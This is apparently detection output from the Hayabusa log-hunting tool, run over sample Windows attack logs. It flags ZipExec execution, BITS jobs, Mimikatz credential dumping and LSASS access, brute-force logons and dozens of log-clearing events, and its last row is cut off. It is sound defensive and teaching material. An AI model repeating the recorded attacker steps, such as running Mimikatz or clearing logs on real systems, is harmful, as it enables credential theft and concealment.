Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" : Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" : Path: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer : URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: mimikatz.exe : Path: C:\TOOLS\Mimikatzx64\mimikatz.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx +2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx +2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 